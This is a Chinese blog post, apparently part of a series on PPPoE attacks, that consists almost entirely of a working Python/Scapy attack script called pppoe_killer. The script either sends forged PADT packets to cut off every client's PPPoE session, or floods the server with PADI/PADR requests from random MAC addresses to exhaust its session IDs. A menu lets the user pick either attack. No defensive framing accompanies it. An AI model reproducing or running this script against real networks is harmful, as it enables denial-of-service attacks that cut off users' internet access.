侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130555 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录

PPPoE协议***5:一个完整的***程序pppoe_killer

2023-05-27 星期六 / 0 评论 / 0 点赞 / 25 阅读 / 2951 字

代码如下:#Thisisaprogramtoattackpppoeconnection.wecalledherpppoe_killer#theprogrambasedenvironmentispyth

.

  

    代码如下:


#This is a program to attack pppoe connection.we called her pppoe_killer#the program based environment is python and scapy,please install scapy modulefrom scapy.all import *import randomimport exceptions#定义一个广播地址的变量broadcast="ff:ff:ff:ff:ff:ff"#定义随机的mac地址,供PPPoE dos***使用def mac():	vmac=[str(random.randint(10,99)),str(random.randint(10,99)),str(random.randint(10,99)),str(random.randint(10,99)),str(random.randint(10,99)),str(random.randint(10,99))]	a=":".join(vmac)	return a	#定义PPPoE数据包的格式,由参数确定该数据包的类型def packet(src,dst,code,sessionid=0,len=16):	a=Ether()/PPPoE()	a.src=src	a.dst=dst	a.type=0x8863	a.payload.version=1	a.payload.type=1	a.payload.code=code	a.payload.sessionid=sessionid	a.payload.len=len	return a#向拨号的客户端发送PADT数据包,切断会话def client_attack(servermac):	while True:		try:			b=sniff(count=1)			if b[0].dst=="ff:ff:ff:ff:ff:ff":				sendp(packet(src=servermac,dst=b[0].src,code=0xa7,sessionid=range(65535),len=0))				print 'We have attach one host,his mac address is '+b[0].src		except Exception,e:			print e			break#伪装大量的MAC地址,DOS***PPPoE服务器,耗竭其sessioniddef dos_attack(broadcast,servermac):	while True:		try:			c=mac()			sendp(packet(src=c,dst=broadcast,code=0x09))			sendp(packet(src=c,dst=servermac,code=0x19))		except Exception,e:			print e			break#获取PPPoE服务器的mac地址test=srp1(packet(src='11:22:33:44:55:66',dst=broadcast,code=0x09,len=0))servermac=test.src#输出菜单,选择***类型print '*'*30print 'when you run the programmer,you should press ctrl+z key to end it'print 'choice 1.	attack all client make them couldn/'t get pppoe connecttion'print 'choice 2.	send PADI and PADR dos the pppoe server,make cilent doesn/'s get the sessionid'print '*'*30#是否做出了合适的选择项while True:	choice=input('now make you choice <1 or 2>:')	if choice!=1 and choice!=2:		print 'your choice is wrong.please input right choice'	else:		breakprint 'now the attack will be beginning'if choice==1:	client_attack(servermac)else:	dos_attack(broadcast,servermac)


.

广告 广告

评论区